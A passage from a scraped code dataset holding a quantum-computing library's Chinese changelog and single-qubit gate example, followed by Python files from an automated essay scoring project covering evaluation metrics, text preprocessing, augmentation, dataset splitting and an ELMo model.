`CNOT`(可逆XOR门), `CCNOT`(可逆AND门). 使用: 输入使用`ApplyFromInt(X, int, Bits)`, 输出使用 `Builtin.MA(Bits)`.\n\n**不要同时引用 `nyasQuantumCalculate` 和 `nyasQuantumCalculate.RevCal`**\n\n### 0.1.2\n\n取消 **选项**`reverseBitIndex`, 增加 **选项**`littleEndian`. 
现在 `ApplyFromInt`, `ControlledOnOnt`, `Bools2Int`, `Int2Bools` 和 `Dump` 方法都受 `littleEndian` 影响.\n\n修复 `Qubit + Qubits` 的顺序错误\n\n现在 `SWAP` 和 `~QFT` 方法是受控过程, 并修复`Options.QFTwithNumpy`为`False`时`IQFT`的逻辑错误\n\n增加 **选项**`inputCheck`, 用于检查输入过程参数的正确性, 比如多个量子位应该在同一个系统内, 过程作用的量子位不应该为控制位, 不应该重复输入相同的量子位, 等.\n\n增加`|1❭`相位旋转门的管理器 `RotationGates`. See more: `help(RotationGates)`\n\n增加高级操作 `加法`: `Add`, `AddInt`, 以及他们的逆操作`I~`, 相位版本`Phase~`和逆相位版本`IPhase~`. 增加n-bit加法电路 `Adder`.\n\n---\n\n### 联系方式\n\nqq群 ~~瑟图群~~ : 274767696\n\n作者: **nyasyamorina** *[qq: 1275935966]* (加好友时请备注来意, 免得当作机器人了)\n\n\n特别感谢 **_hyl** 提供 `pyi` 文件的翻译, _hyl: `\"如果发现翻译有错的话, 可以去找我商讨\"` *[qq: 2738846947]*\n\n还有非常感激广大群友提供技术支持\n" }, { "alpha_fraction": 0.6055616736412048, "alphanum_fraction": 0.646908164024353, "avg_line_length": 24.073394775390625, "blob_id": "c68d8fdafad0471df4ccbaba822a2f5524f9a59e", "content_id": "156b78df5ec84b814d79114c4b4cfe5f9fe571e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2893, "license_type": "no_license", "max_line_length": 66, "num_lines": 109, "path": "/examples/0-SingleQubitGate.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\nfrom nyasQuantumCalculate import *\n\n\nsytm = QubitsSystem(1)\nqubit: Qubit = sytm[0]\n\n\nprint(\"Original qubit:\")\nDumpSystemText(qubit.system) # ∣0❭: 1, ∣1❭: 0\n\n\n# Identity Gate\n# I gate doing somthing looks like do nothing\nprint(\"after Identity gate:\")\nBuiltin.I(qubit)\nDumpSystemText(qubit.system) # ∣0❭: 1, ∣1❭: 0\n# Reset\n\n\n# Pauli Gates\n# X gate can reverse states ∣0❭ and ∣1❭\nprint(\"after pauli-X gate:\")\nBuiltin.X(qubit)\nDumpSystemText(qubit.system) # ∣0❭: 0, ∣1❭: 1\nBuiltin.X(qubit) # Reset\n\n# Y gate do similar thing as X gate, but on image number\nprint(\"after pauli-Y gate:\")\nBuiltin.Y(qubit)\nDumpSystemText(qubit.system) # ∣0❭: 0, ∣1❭: i\nBuiltin.Y(qubit) # Reset\n\n# Z gate will flip the phase of ∣1❭, but do nothing on ∣0❭\nprint(\"after pauli-X gate and pauli-Z gate:\")\nBuiltin.X(qubit) # ∣0❭: 0, ∣1❭: 1\nBuiltin.Z(qubit)\nDumpSystemText(qubit.system) # ∣0❭: 0, ∣1❭: -1\nBuiltin.Z(qubit)\nBuiltin.X(qubit) # Reset\n\n\n# Hadamard Gate\n# H gate will make qubit between ∣0❭ and ∣1❭\nprint(\"after Hadamard gate:\")\nBuiltin.H(qubit)\nDumpSystemText(qubit.system) # ∣0❭: .707, ∣1❭: .707\nBuiltin.H(qubit) # Reset\n\n\n# Pahse Shift Gates\n# T gate and S gate will shift phase of ∣1❭, but do nothing on ∣0❭\nprint(\"after pauli-X gate and T gate:\")\nBuiltin.X(qubit) # ∣0❭: 0, ∣1❭: 1\nBuiltin.T(qubit)\nDumpSystemText(qubit.system) # ∣0❭: 0, ∣1❭: .707+.707i\nBuiltin.TR(qubit)\nBuiltin.X(qubit) # Reset\n\nprint(\"after pauli-X gate and S gate:\")\nBuiltin.X(qubit) # ∣0❭: 0, ∣1❭: 1\nBuiltin.S(qubit)\nDumpSystemText(qubit.system) # ∣0❭: 0, ∣1❭: i\nBuiltin.SR(qubit)\nBuiltin.X(qubit) # Reset\n\n\n# Rotation Gates\n# rotation gates will \"rotate\" the qubit on \"Bloch sphere\"\n# https://en.wikipedia.org/wiki/Bloch_sphere\nangle = 1.0471975511966 # pi / 3\n\nprint(\"after Rotation-X gate:\")\nRx(angle)(qubit)\nDumpSystemText(qubit.system) # ∣0❭: .866, ∣1❭: -.5i\nRx(-angle)(qubit) # Reset\n\nprint(\"after Rotation-Y gate:\")\nRy(angle)(qubit)\nDumpSystemText(qubit.system) # ∣0❭: .866, ∣1❭: .5\nRy(-angle)(qubit) # Reset\n\nprint(\"after Rotation-Z gate:\")\nRz(angle)(qubit)\nDumpSystemText(qubit.system) # ∣0❭: .866-.5i, ∣1❭: 0\nRz(-angle)(qubit) # 
Reset\n\nprint(\"after pauli-X gate and Rotation-1 gate:\")\nBuiltin.X(qubit)\nR1(angle)(qubit)\nDumpSystemText(qubit.system) # ∣0❭: 0, ∣1❭: .5+.866i\nR1(-angle)(qubit)\nBuiltin.X(qubit) # Reset\n\n\n# Phase Gate\n# phase gate will shift global phase\nprint(\"after Phase gate:\")\nPhase(angle)(qubit)\nDumpSystemText(qubit.system) # ∣0❭: .5+.866i, ∣1❭: 0\nPhase(-angle)(qubit) # Reset\n\n\n# Exit\nBuiltin.RA(sytm.getQubits())\n" } ]
39
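The usage notes in the nyasQuantumCalculate README above (gates applied via `__call__`, `Builtin.MA` for measurement, `Builtin.RA` for resetting) compose into very short programs. A minimal sketch preparing and measuring a Bell pair, assuming the two-qubit `Builtin.CNOT` listed in the README is called as `(control, target)` in the same style as the bundled examples:

```python
from nyasQuantumCalculate import *

qbsys = QubitsSystem(2)
q0, q1 = qbsys[0], qbsys[1]          # index access, as in the bundled examples

Builtin.H(q0)                        # put the first qubit into superposition
Builtin.CNOT(q0, q1)                 # entangle the pair (assumed (control, target) call)

results = Builtin.MA(qbsys.getQubits())   # measure every qubit at once
print(results)                       # correlated: [False, False] or [True, True]

Builtin.RA(qbsys.getQubits())        # reset the whole system before exiting, per the README
```

The two measurement outcomes always agree, which is the quickest sanity check that the simulated entanglement behaves as expected.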
sunnypwang/aes
https://github.com/sunnypwang/aes
6cb1dd30aee719fe425c092521ca073e7b224aac
ca05e15a6e78e805197545eef541ebb7292f90fb
ddd2c777b489d083fa6852c5e028bdc1194b2ad8
refs/heads/master
2022-12-24T10:59:29.234947
2020-10-02T07:10:31
2020-10-02T07:10:31
266,822,244
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.5299122333526611, "alphanum_fraction": 0.5432815551757812, "avg_line_length": 37.36787414550781, "blob_id": "4d2f6a12b1c206b5f1020638a1d07c8dc7011465", "content_id": "f38f85a3d5763002f8ce99849f6053150b4edd7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7405, "license_type": "no_license", "max_line_length": 145, "num_lines": 193, "path": "/eval_utils.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport os\nfrom keras.callbacks import *\nfrom sklearn.metrics import cohen_kappa_score\nimport utils\nfrom data_utils import gen, prepare_features, rescale_to_int\n\n\nclass EvaluateCallback(Callback):\n def __init__(self, prompt, val_data, model_name, vocab=None, batch_size=5):\n self.prompt = prompt\n self.val_data = val_data\n self.model_name = model_name\n self.vocab = vocab\n self.batch_size = batch_size\n self.steps = np.ceil(len(val_data) / batch_size)\n self.y_true = prepare_features(model_name,\n df=val_data, prompt=prompt, y_only=True)\n\n def on_epoch_end(self, epoch, logs):\n y_pred = self.model.predict_generator(\n gen(self.model_name, self.prompt, self.val_data, self.vocab, self.batch_size, test=True, shuffle=False), steps=self.steps, verbose=1)\n\n generate_qwk(self.prompt, self.model_name,\n self.y_true, y_pred, epoch+1, 'val')\n\n\ndef generate_qwk(prompt, model_name, y_true, y_pred, epoch, suffix=''):\n path = utils.mkpath('pred/{}'.format(model_name))\n\n y_true = rescale_to_int(y_true, prompt)\n y_pred = rescale_to_int(y_pred, prompt)\n qwk = QWK(y_true, y_pred)\n\n with open(os.path.join(path, 'qwk_{}_{}.csv'.format(prompt, suffix)), 'a+') as f:\n f.write('{}, {}\\n'.format(epoch, qwk))\n\n\ndef generate_score(prompt, model_name, epoch, y_true, y_pred, aug_pred, test_df):\n path = utils.mkpath('pred/{}'.format(model_name))\n\n df = pd.DataFrame()\n df['essay_id'] = test_df['essay_id']\n df['essay_set'] = test_df['essay_set']\n df['domain1_score'] = y_true\n df['test'] = y_pred\n for key in aug_pred:\n df['test_' + key] = aug_pred[key]\n df.to_csv(os.path.join(path, 'score_{}_{}.tsv'.format(prompt, epoch)),\n sep='\\t', index=False)\n return df\n\n\ndef generate_robustness(prompt, model_name, epoch, y_true, y_pred, aug_pred):\n path = utils.mkpath('pred/{}'.format(model_name))\n\n # y_true = rescale_to_int(y_true, prompt)\n y_pred_int = rescale_to_int(y_pred, prompt)\n aug_pred_int = {}\n wr_t, br_t, w_t, b_t = 0, 0, 0, 0\n N = len(y_pred) * len(aug_pred)\n print('N :', N)\n\n with open(os.path.join(path, 'robustness_{}_{}.csv'.format(prompt, epoch)), 'w+') as f:\n f.write('augment,worse_raw,better_raw,worse_resolved,better_resolved\\n')\n for key in aug_pred:\n aug_pred_int[key] = rescale_to_int(aug_pred[key], prompt)\n\n wr, br, w, b = robustness(\n y_pred, aug_pred[key], y_pred_int, aug_pred_int[key])\n wr_t += wr\n br_t += br\n w_t += w\n b_t += b\n f.write('{},{},{},{},{}\\n'.format(key, wr, br, w, b))\n f.write('sum,{},{},{},{}\\n'.format(wr_t, br_t, w_t, b_t))\n f.write('avg,{},{},{},{}\\n'.format(wr_t/N, br_t/N, w_t/N, b_t/N))\n\n\ndef generate_summary(model_name, epoch):\n prompts = [1, 2, 3, 4, 5, 6, 7, 8]\n # number of essay in test set\n length = [-1, 179, 180, 173, 177, 181, 180, 157, 73]\n path = utils.mkpath('pred/{}'.format(model_name))\n\n with open(os.path.join(path, 'summary_{}.txt'.format(epoch)), 'w+') as f:\n f.write('{} epoch {}\\n\\n'.format(model_name, epoch))\n f.write('QWK\\n')\n qwk_avg = 0\n for p in 
prompts:\n qwk_df = pd.read_csv(os.path.join(path, 'qwk_{}_test.csv'.format(\n p)), header=None, names=['epoch', 'qwk'])\n qwk = qwk_df[qwk_df['epoch'] == epoch].values[-1, -1]\n f.write('{}\\t{}\\n'.format(p, qwk))\n qwk_avg += qwk\n\n f.write('\\nRobustness per prompt\\n')\n r_avg = 0\n r_aug_avg = 0\n for p in prompts:\n robustness_df = pd.read_csv(os.path.join(\n path, 'robustness_{}_{}.csv'.format(p, epoch)))\n r = (robustness_df['worse_resolved'] -\n robustness_df['better_resolved']).values[-1]\n f.write('{}\\t{}\\n'.format(p, r))\n r_avg += r\n\n r_aug = (robustness_df['worse_resolved'] -\n robustness_df['better_resolved']).values[:-2]/length[p]\n r_aug_avg += r_aug\n\n f.write('\\nRobustness per augment\\n')\n r_aug_avg /= 8\n for a, r in zip(robustness_df['augment'][:-2], r_aug_avg):\n f.write('{}\\t{}\\n'.format(a, r))\n\n f.write('\\n')\n f.write('QWK Average:\\t{}\\n'.format(qwk_avg / 8))\n f.write('Robustness Average:\\t{}\\n'.format(r_avg / 8))\n f.write('Robustness Average:\\t{}\\n'.format(r_aug_avg.mean()))\n print('summary generated!')\n\n\ndef generate_summary_best(model_name):\n prompts = [1, 2, 3, 4, 5, 6, 7, 8]\n # number of essay in test set\n length = [-1, 179, 180, 173, 177, 181, 180, 157, 73]\n path = utils.mkpath('pred/{}'.format(model_name))\n\n best_ep = [-1]*9\n with open(os.path.join(path, 'summary_best.txt'), 'w+') as f:\n f.write('{}\\n\\n'.format(model_name))\n f.write('QWK\\n')\n f.write('epoch\\tprompt\\tqwk\\n')\n qwk_avg = 0\n for p in prompts:\n qwk_df = pd.read_csv(os.path.join(path, 'qwk_{}_val.csv'.format(\n p)), header=None, names=['epoch', 'qwk'])\n max_idx = qwk_df['qwk'].idxmax()\n best_ep[p] = int(qwk_df.iloc[max_idx].values[0])\n\n qwk_df = pd.read_csv(os.path.join(path, 'qwk_{}_test.csv'.format(\n p)), header=None, names=['epoch', 'qwk'])\n\n try:\n tmp = qwk_df[qwk_df['epoch'] == best_ep[p]].values\n # in case of multiple runs of same epoch, pick one with the best QWK\n ep, qwk = tmp[tmp.argmax(axis=0)[-1]]\n except:\n raise Exception(\n 'Error: epoch {} of prompt {} not found in test'.format(best_ep[p], p))\n\n f.write('{}\\t{}\\t{}\\n'.format(best_ep[p], p, qwk))\n qwk_avg += qwk\n\n f.write('\\nRobustness per prompt\\n')\n r_avg = 0\n r_aug_avg = 0\n for p in prompts:\n robustness_df = pd.read_csv(os.path.join(\n path, 'robustness_{}_{}.csv'.format(p, best_ep[p])))\n r = (robustness_df['worse_resolved'] -\n robustness_df['better_resolved']).values[-1]\n f.write('{}\\t{}\\n'.format(p, r))\n r_avg += r\n\n r_aug = (robustness_df['worse_resolved'] -\n robustness_df['better_resolved']).values[:-2]/length[p]\n r_aug_avg += r_aug\n\n f.write('\\nRobustness per augment\\n')\n r_aug_avg /= 8\n for a, r in zip(robustness_df['augment'][:-2], r_aug_avg):\n f.write('{}\\t{}\\n'.format(a, r))\n\n f.write('\\n')\n f.write('QWK Average:\\t{}\\n'.format(qwk_avg / 8))\n f.write('Robustness Average:\\t{}\\n'.format(r_avg / 8))\n f.write('Robustness Average:\\t{}\\n'.format(r_aug_avg.mean()))\n print('summary generated!')\n\n\ndef QWK(y_true, y_pred):\n return cohen_kappa_score(y_true, y_pred, weights='quadratic')\n\n\ndef robustness(original, augment, original_int, augment_int, threshold=0.0):\n worse_raw = np.sum(original - augment > threshold)\n better_raw = np.sum(augment - original > threshold)\n worse_resolved = np.sum(original_int > augment_int)\n better_resolved = np.sum(original_int < augment_int)\n return worse_raw, better_raw, worse_resolved, better_resolved\n" }, { "alpha_fraction": 0.5233458280563354, "alphanum_fraction": 0.5354596376419067, 
"avg_line_length": 30.581113815307617, "blob_id": "136b7116f970b97ec3930cab8caf3a84d7d611d8", "content_id": "eb7e28524c4b487ff97e0e32a10506f02399ff9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13043, "license_type": "no_license", "max_line_length": 188, "num_lines": 413, "path": "/data_utils.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport re\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nimport json\nimport collections\nfrom keras.preprocessing.sequence import pad_sequences\n\nimport os\n\nimport utils\n\naugment_set = ['no_art', 'no_conj', 'add_and-0.1', 'swap_word-0.05',\n 'no_first_sent', 'no_last_sent', 'no_longest_sent', 'reverse_sent']\n\n\nMAXLEN = [-1, 70, 88, 22, 23, 24, 20, 67, 97] # Max\n# MAXLEN = [-1, 47, 44, 14, 10, 15, 16, 32, 79] # 1.5IQR Max\nMAXWORDLEN = 50\n\nPAD_SENT_TOKEN = ''\n\nscore_range = [(-1, -1),\n (2, 12),\n (1, 6),\n (0, 3),\n (0, 3),\n (0, 4),\n (0, 4),\n (0, 30),\n (0, 60)]\n\n\ndef get_threshold(p):\n low, high = score_range[p]\n return 1/((high - low))\n\n\ndef rescale_to_int(raw, p):\n assert (raw >= 0.).all() and (raw <= 1.).all()\n low, high = score_range[p]\n return np.around(raw * (high - low) + low).astype(int)\n\n\ndef normalize_score(Y, p):\n low, high = score_range[p]\n Y = np.array(Y)\n Y_norm = (Y - low)/(high - low)\n assert (Y_norm >= 0.).all() and (Y_norm <= 1.).all()\n Y_resolved = rescale_to_int(Y_norm, p)\n try:\n assert np.equal(Y, Y_resolved).all()\n except AssertionError:\n for i in range(len(Y)):\n if Y[i] != Y_resolved[i]:\n print(i, Y[i], Y_resolved[i])\n print('use python3')\n return Y_norm\n\n\ndef clean_text(text):\n # Lowercase\n text = text.lower()\n # Remove quotation\n text = re.sub(r'\\\"', '', text)\n # URL replace by https://github.com/feidong1991/aes\n text = re.sub(\n '(http[s]?://)?((www)\\.)?([a-zA-Z0-9]+)\\.{1}((com)(\\.(cn))?|(org))', '<url>', text)\n # Truncate any duplicate non-alphanumeric and add a space after it\n # e.g. sent1.sent2!!!...??? becomes sent1. sent2! . 
?\n text = re.sub(r'([^a-zA-Z0-9_@\\'\\s])\\1*', r'\\1 ', text)\n\n # Remove extra whitespaces\n text = re.sub(r'\\s+', ' ', text)\n\n return text\n\n\ndef tokenize(text):\n '''Word tokenize using NLTK word_tokenize'''\n tokens = word_tokenize(text)\n for index, token in enumerate(tokens):\n if token == '@' and (index+1) < len(tokens):\n tokens[index+1] = '@' + re.sub('[0-9]+.*', '', tokens[index+1])\n tokens.pop(index)\n return tokens\n\n\ndef sentenize(text):\n '''Sentence tokenize using NLTK sent_tokenize'''\n sents = sent_tokenize(text)\n return sents\n\n\ndef shorten_sentence(tokens):\n if len(tokens) <= MAXWORDLEN:\n return [tokens]\n\n # Step 1: split sentence based on keywords\n # split_keywords = ['because', 'but', 'so', 'then', 'You', 'He', 'She', 'We', 'It', 'They', 'Your', 'His', 'Her']\n split_keywords = ['because', 'but', 'so', 'then']\n k_indexes = [i for i, key in enumerate(tokens) if key in split_keywords]\n processed_tokens = []\n if not k_indexes:\n num = len(tokens) // MAXWORDLEN\n k_indexes = [(i+1)*MAXWORDLEN for i in range(num)]\n\n if len(tokens[:k_indexes[0]]) > 0:\n processed_tokens.append(tokens[:k_indexes[0]])\n len_k = len(k_indexes)\n for j in range(len_k-1):\n processed_tokens.append(tokens[k_indexes[j]:k_indexes[j+1]])\n processed_tokens.append(tokens[k_indexes[-1]:])\n\n # Step 2: split sentence to no more than MAXWORDLEN\n # if there are still sentences whose length exceeds MAXWORDLEN\n new_tokens = []\n for token in processed_tokens:\n if len(token) > MAXWORDLEN:\n num = len(token) // MAXWORDLEN\n s_indexes = [(i+1)*MAXWORDLEN for i in range(num)]\n len_s = len(s_indexes)\n if len(token[:s_indexes[0]]) > 0:\n new_tokens.append(token[0:s_indexes[0]])\n for j in range(len_s-1):\n new_tokens.append(token[s_indexes[j]:s_indexes[j+1]])\n new_tokens.append(token[s_indexes[-1]:])\n else:\n new_tokens.append(token)\n # print('before', len(tokens), 'after', [len(x) for x in new_tokens])\n return new_tokens\n\n\ndef load_glove_embedding(path, vocab, emb_dim=50):\n scale = np.sqrt(3.0 / emb_dim)\n emb_matrix = np.empty((len(vocab), emb_dim))\n emb_dict = {}\n with open(path, 'r', encoding='utf-8') as f:\n for line in f:\n args = line.split()\n word = args[0]\n vec = args[1:]\n emb_dict[word] = vec\n oov = 0\n for w in vocab:\n if w in emb_dict:\n emb = np.array(emb_dict[w])\n else:\n emb = np.random.uniform(-scale, scale, emb_dim)\n oov += 1\n emb_matrix[vocab[w]] = emb\n print('OOV: ', oov/len(vocab))\n del emb_dict\n return emb_matrix\n\n\ndef get_vocab(prompt, df=None, length=4000, features='essay'):\n vocab_path = utils.mkpath('vocab')\n file_path = os.path.join(vocab_path, '{}.vocab'.format(prompt))\n if os.path.isfile(file_path):\n with open(file_path, 'r') as f:\n vocab = json.load(f)\n assert type(vocab) == dict\n print('load vocab from {}'.format(file_path))\n return vocab\n\n word_all = []\n for essay in df[features]:\n sents = sentenize(essay)\n for sent in sents:\n words = tokenize(sent)\n word_all.extend(words)\n print('word count:', len(word_all))\n print('unique word count:', len(set(word_all)))\n\n most_common = collections.Counter(word_all).most_common(length - 3)\n\n vocab = {'<pad>': 0, '<unk>': 1, '<num>': 2}\n for w, c in most_common:\n vocab[w] = len(vocab)\n\n # save as JSON\n with open(file_path, 'w') as f:\n json.dump(vocab, f)\n print('save vocab to {}'.format(file_path))\n\n return vocab\n\n\n# def compute_maxsen(df, prompt):\n# maxx = 0\n# for essay in df['essay']:s\n# if MAX_LEN[prompt] < len(essay):\n# MAX_LEN[prompt] = 
len(essay)\n\ndef word2idx(w, vocab):\n if not w in vocab:\n return vocab['<unk>']\n return vocab[w]\n\n\ndef prepare_glove_features(df, prompt, vocab=None, features='essay', labels='domain1_score', x_only=False, pad=True, split_long_sent=True, y_only=False, norm=True, augment=None, rnd=None):\n assert not (x_only and y_only)\n if not y_only:\n X = np.zeros((len(df), MAXLEN[prompt], MAXWORDLEN), dtype=int)\n if not vocab:\n vocab = get_vocab(prompt, df)\n for i, essay in enumerate(df[features]):\n sents = sentenize(essay)\n if augment:\n sents = make_augment(sents, augment, rnd)\n sent_idxs = []\n for sent in sents:\n words = tokenize(sent)\n if split_long_sent:\n split_list = shorten_sentence(words)\n for word_tokens in split_list:\n sent_idxs.append([word2idx(w, vocab)\n for w in word_tokens])\n else:\n sent_idxs.append([word2idx(w, vocab) for w in words])\n\n if pad:\n sent_idxs = pad_sequences(\n sent_idxs, maxlen=MAXWORDLEN, dtype=object, padding='post', truncating='post', value=0)\n # print(sent_idxs.shape == X[i, :len(sent_idxs)].shape)\n X[i, :len(sent_idxs)] = sent_idxs\n if x_only:\n return X\n if not x_only:\n Y = np.array(df[labels].tolist())\n if norm:\n Y = normalize_score(Y, prompt)\n if y_only:\n return Y\n return X, Y\n\n\ndef prepare_elmo_features(df, prompt, vocab=None, features='essay', labels='domain1_score', x_only=False, pad=True, y_only=False, norm=True, augment=None, rnd=None):\n assert not (x_only and y_only)\n if not y_only:\n X = []\n # Sentence tokenize and make augment\n for essay in df[features]:\n sents = sentenize(essay)\n if augment:\n X.append(make_augment(sents, augment, rnd))\n else:\n X.append(sents)\n X = np.array(X)\n if pad:\n X = pad_sequences(X, maxlen=MAXLEN[prompt], dtype=object,\n padding='post', truncating='post', value=PAD_SENT_TOKEN)[:, :, None]\n if x_only:\n return X\n if not x_only:\n Y = np.array(df[labels].tolist())\n\n if norm:\n Y = normalize_score(Y, prompt)\n\n if y_only:\n return Y\n\n return X, Y\n\n\ndef load_data(prompt, suffix=None, fold=1):\n if suffix:\n data = pd.read_csv(\n 'asap/fold_{}/prompt_{}_{}.tsv'.format(fold, prompt, suffix), sep='\\t')\n else:\n data = pd.read_csv(\n 'asap/fold_{}/prompt_{}.tsv'.format(fold, prompt), sep='\\t')\n return data\n\n\ndef load_elmo_features(prompt, suffix=None, fold=1, **kwargs):\n data = load_data(prompt, suffix, fold)\n return prepare_elmo_features(\n data, prompt, **kwargs)\n\n\ndef prepare_features(model_name, **kwargs):\n if model_name.startswith('elmo'):\n return prepare_elmo_features(**kwargs)\n elif model_name.startswith('glove'):\n return prepare_glove_features(**kwargs)\n\n\ndef gen(model_name, prompt, df, vocab=None, batch_size=1, test=False, shuffle=True, **kwargs):\n data = df.copy()\n while True:\n if shuffle:\n data = data.sample(frac=1).reset_index(drop=True)\n for i in range(0, len(data), batch_size):\n j = min(len(data), i+batch_size)\n if test:\n x = prepare_features(model_name,\n df=data[i:j], prompt=prompt, vocab=vocab, x_only=True, **kwargs)\n yield x\n else:\n x, y = prepare_features(model_name,\n df=data[i:j], prompt=prompt, vocab=vocab, **kwargs)\n yield x, y\n\n\ndef elmo_gen(prompt, df, batch_size=1, test=False, shuffle=True, **kwargs):\n data = df.copy()\n while True:\n if shuffle:\n data = data.sample(frac=1).reset_index(drop=True)\n for i in range(0, len(data), batch_size):\n j = min(len(data), i+batch_size)\n if test:\n x = prepare_elmo_features(\n data[i:j], prompt, x_only=True, **kwargs)\n yield x\n else:\n x, y = prepare_elmo_features(data[i:j], 
prompt, **kwargs)\n yield x, y\n\n\ndef augment_gen(model_name, prompt, test_df, vocab=None, batch_size=1, augment=None, **kwargs):\n data = test_df.copy()\n rnd = np.random.RandomState(1)\n while True:\n for i in range(0, len(data), batch_size):\n j = min(len(data), i+batch_size)\n\n x = prepare_features(model_name,\n df=data[i:j], prompt=prompt, vocab=vocab, x_only=True, augment=augment, rnd=rnd, **kwargs)\n yield x\n\n\ndef make_augment(sents, augment, rnd=None):\n '''augment essay (list of sentences)'''\n assert augment in augment_set\n t = augment.split('-')\n if len(t) > 1:\n augment, threshold = t[0], float(t[1])\n else:\n threshold = 1.0\n\n new_sents = []\n if not rnd:\n rnd = np.random.RandomState(1)\n\n if augment == 'no_art':\n for sent in sents:\n new_sents.append(re.sub(r'\\b(a|an|the)\\b ', r'', sent))\n\n elif augment == 'no_conj':\n for sent in sents:\n new_sents.append(re.sub(r'\\b(and|or|but)\\b ', r'', sent))\n\n elif augment == 'add_and':\n for sent in sents:\n state = rnd.rand()\n if state < threshold:\n sent = 'and ' + sent\n new_sents.append(sent)\n\n elif augment == 'swap_word':\n for sent in sents:\n words = sent.split()\n word_idx = np.arange(len(words)-2)\n rnd.shuffle(word_idx)\n for i in word_idx:\n state = rnd.rand()\n if state < threshold:\n words[i], words[i+1] = words[i+1], words[i]\n new_sents.append(' '.join(words))\n\n elif augment == 'no_first_sent':\n if len(sents) > 1:\n new_sents.extend(sents[1:])\n else:\n new_sents.extend(['.'])\n\n elif augment == 'no_last_sent':\n if len(sents) > 1:\n new_sents.extend(sents[:-1])\n else:\n new_sents.extend(['.'])\n\n elif augment == 'no_longest_sent':\n if len(sents) > 1:\n maxidx = np.argmax([len(sent) for sent in sents])\n new_sents.extend(sents[:maxidx] + sents[maxidx+1:])\n else:\n new_sents.extend(['.'])\n\n elif augment == 'reverse_sent':\n new_sents.extend(sents[::-1])\n\n else:\n raise NameError('Unknown augment : ' + str(augment))\n assert type(new_sents) is list\n return new_sents\n\n# def load_data(prompt_id, fold_id, suffix):\n# path = 'prompt_{}/new/fold_{}/prompt_{}_{}.tsv'.format(\n# prompt_id, fold_id, prompt_id, suffix)\n# df = pd.read_csv(path, sep='\\t')\n# return df\n\n\ndef clean_data(df):\n new_df = []\n for essay in df:\n new_df.append(clean_text(essay))\n return new_df\n" }, { "alpha_fraction": 0.5188062191009521, "alphanum_fraction": 0.5282093286514282, "avg_line_length": 39.09836196899414, "blob_id": "0bd06729c81021a6ce30b9ec2bd5069b752b482b", "content_id": "ed8bfcd9ce345d237c1215b88a01791e2869fb42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2446, "license_type": "no_license", "max_line_length": 87, "num_lines": 61, "path": "/create_dataset.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import pandas as pd\nfrom unidecode import unidecode\nfrom sklearn.model_selection import KFold, train_test_split\n\nfrom data_utils import clean_data\nimport utils\n\n\ndef convert_to_ascii(df):\n new_df = []\n for essay in df:\n new_df.append(unidecode(essay))\n return new_df\n\n\ndef create_dataset(fold=True):\n '''Run this function once to create train,val,test files for K folds'''\n data_all = pd.read_csv('asap/training_set_rel3.fixed.tsv.zip',\n sep='\\t', encoding='latin1')\n data_all['essay'] = convert_to_ascii(data_all['essay'])\n data_all['essay'] = clean_data(data_all['essay'])\n\n for p in range(1, 9):\n data_prompt = data_all[data_all['essay_set']\n == p].reset_index(drop=True)\n 
print(data_prompt.head())\n\n if fold:\n kf = KFold(n_splits=5, shuffle=True, random_state=420)\n n = 1\n for train_index, test_index in kf.split(data_prompt):\n # print(\"TRAIN:\", train_index[:10], \"TEST:\", test_index[:10])\n val_index = test_index[:len(test_index)//2]\n test_index = test_index[len(test_index)//2:]\n print(len(train_index), len(val_index), len(test_index))\n\n fold_path = utils.mkpath('asap/fold_{}/'.format(n))\n data_prompt.loc[train_index].to_csv(\n fold_path + 'prompt_{}_train.tsv'.format(p), sep='\\t', index=False)\n data_prompt.loc[val_index].to_csv(\n fold_path + 'prompt_{}_val.tsv'.format(p), sep='\\t', index=False)\n data_prompt.loc[test_index].to_csv(\n fold_path + 'prompt_{}_test.tsv'.format(p), sep='\\t', index=False)\n n += 1\n else:\n train, test = train_test_split(\n data_prompt, test_size=0.2, random_state=420, shuffle=False)\n val = test[:len(test)//2]\n test = test[len(test)//2:]\n path = utils.mkpath('asap/')\n print(len(train), len(val), len(test))\n train.to_csv(path + 'prompt_{}_train.tsv'.format(p),\n sep='\\t', index=False)\n val.to_csv(path + 'prompt_{}_val.tsv'.format(p),\n sep='\\t', index=False)\n test.to_csv(path + 'prompt_{}_test.tsv'.format(p),\n sep='\\t', index=False)\n\n\nif __name__ == \"__main__\":\n create_dataset(fold=True)\n" }, { "alpha_fraction": 0.6088483333587646, "alphanum_fraction": 0.619983971118927, "avg_line_length": 36.61509323120117, "blob_id": "79719bc5fb1f1737dd2cac43f5d42a177d45ff59", "content_id": "45dc89c951047adf7925c67427d8aa3e8ebc6174", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9968, "license_type": "no_license", "max_line_length": 134, "num_lines": 265, "path": "/models.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import numpy as np\nimport tensorflow_hub as hub\nimport tensorflow as tf\nfrom keras import backend as K\nfrom keras.models import Model, model_from_yaml\nfrom keras.layers import *\nfrom keras.activations import softmax\nfrom keras.initializers import Constant\nfrom data_utils import PAD_SENT_TOKEN\nfrom data_utils import MAXLEN, MAXWORDLEN\n\n\nclass ElmoEmbeddingLayer(Layer):\n # ElmoEmbeddingLayer based on https://github.com/strongio/keras-elmo/blob/master/Elmo%20Keras.ipynb\n def __init__(self, maxlen, **kwargs):\n self.dimensions = 1024\n self.trainable = True\n self.maxlen = maxlen\n super(ElmoEmbeddingLayer, self).__init__(**kwargs)\n\n def build(self, input_shape):\n self.elmo = hub.Module('https://tfhub.dev/google/elmo/3', trainable=self.trainable,\n name=\"{}_module\".format(self.name))\n\n self.trainable_weights += tf.trainable_variables(\n 